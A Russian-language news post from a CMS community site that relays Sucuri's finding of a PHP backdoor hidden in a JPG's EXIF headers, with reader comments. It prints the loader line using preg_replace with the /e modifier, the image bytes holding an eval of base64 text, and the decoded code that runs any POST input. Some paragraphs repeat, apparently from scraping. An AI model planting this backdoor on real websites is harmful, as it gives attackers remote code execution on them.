Voting
Какую CMS Вы предпочитаете
AtomX
Fapos CMS
Drunya CMS
Top news
- Генератор аватарок в стиле пиксель-арт
- Скачать Fapos CMS 1.1.8 Бесплатно
- Цунами в Японии. Последствия.
- Описание версии CMS Fapos 0.9.9
- Предварительная инфа о FAPOS 1.1.9. Часть 2
- Новая версия Fapos 1.3
- Что есть Fapos CMS
- Половина россиян не смогла отличить легальный контент
- Убийца Apache у вас на пороге
- Открытое тестирование Fapos 0.9.9
Recent comments
Top users
Sites on AtomX CMS
Компания Sucuri обнаружила новый способ внедрения бэкдора на веб-сайт: код прячется в служебном поле EXIF изображения JPG. Это может
быть или новое изображение, которое пользователям разрешено добавлять на
сайт, например, в качестве своего аватара или другой фотографии на
форуме. Или это может быть измененная версия оригинального изображения.
На взломанном сайте был обнаружен на первый взгляд нормальный PHP-код, содержащий две функции PHP. Первая функция служит для
считывания служебных данных EXIF из файла JPG, а вторая функция
запускает программу.
Как и следовало предполагать, вторую часть бэкдора нашли в файле bun.jpg.
Заголовок Make содержит параметр "/.*/e". В PHP-функции preg_replace параметр /e используется для исполнения передаваемого ему кода. В то же
время заголовок Model содержит непосредственно сам код.
Если расшифровать текст, закодированный в base64, то мы увидим .
То есть бэкдор готов запустить на исполнение любой контент, полученный в POST-запросе через переменную zzl.
По мнению исследователей, это довольно необычный способ прятать исполняемый код на сайте. Эдакий взлом с элементами стеганографии.
быть или новое изображение, которое пользователям разрешено добавлять на
сайт, например, в качестве своего аватара или другой фотографии на
форуме. Или это может быть измененная версия оригинального изображения.
На взломанном сайте был обнаружен на первый взгляд нормальный PHP-код, содержащий две функции PHP. Первая функция служит для
считывания служебных данных EXIF из файла JPG, а вторая функция
запускает программу.
Code:
$exif = exif_read_data('/homepages/clientsitepath/images/stories/food/bun.jpg');preg_replace($exif['Make'],$exif['Model'],'');
Code:
ÿØÿà^@^PJFIF^@^A^B^@^@d^@d^@^@ÿá^@¡Exif^@^@II*^@^H^@^@^@^B^@^O^A^B^@^F^@^@^@&^@^@^@^P^A^B^@m^@^@^@,^@^@^@^@^@^@^@/.*/e^
@ eval ( base64_decode("aWYgKGl zc2V0KCRfUE9TVFsie noxIl0pKSB7ZXZhbChzd
HJpcHNsYXNoZXMoJF9QT1NUWyJ6ejEiXSkpO30='));
@ÿì^@^QDucky^@^A^@^D^@^@^@<^@^@ÿî^@^NAdobe^
@ eval ( base64_decode("aWYgKGl zc2V0KCRfUE9TVFsie noxIl0pKSB7ZXZhbChzd
HJpcHNsYXNoZXMoJF9QT1NUWyJ6ejEiXSkpO30='));
@ÿì^@^QDucky^@^A^@^D^@^@^@<^@^@ÿî^@^NAdobe^
время заголовок Model содержит непосредственно сам код.
Если расшифровать текст, закодированный в base64, то мы увидим .
Code:
if (isset($_POST["zz1"])) {eval(stripslashes($_POST["zz1"]));}
По мнению исследователей, это довольно необычный способ прятать исполняемый код на сайте. Эдакий взлом с элементами стеганографии.
Комментарии
-
Сашка_из_Шебекино
Так у нас exif_read_data() нигде не используется, нам не грозитДата отправления: 21 Jul 2013 -
boriska
тэээкс ща взломаем что-нибудь хы
А вообще надо бы защиту на фапос придумать а?
Дата отправления: 20 Jul 2013
Категории:
Сейчас online: 8. Зарегистрированных: 0. Гостей: 8.
AtomX 2.8 Beta - Новая версия бесплатной CMS
AtomX 2.8 Beta - Новая версия бесплатной CMS
Программирование - что может быть проще.
Программирование - что может быть проще.
AtomX 2.8 Beta - Новая версия бесплатной CMS
AtomX 2.8 Beta - Новая версия бесплатной CMS
Написание простого вируса в блокноте
Что такое API и для чего они нужны
Классы в PHP для чайников
Написание простого вируса в блокноте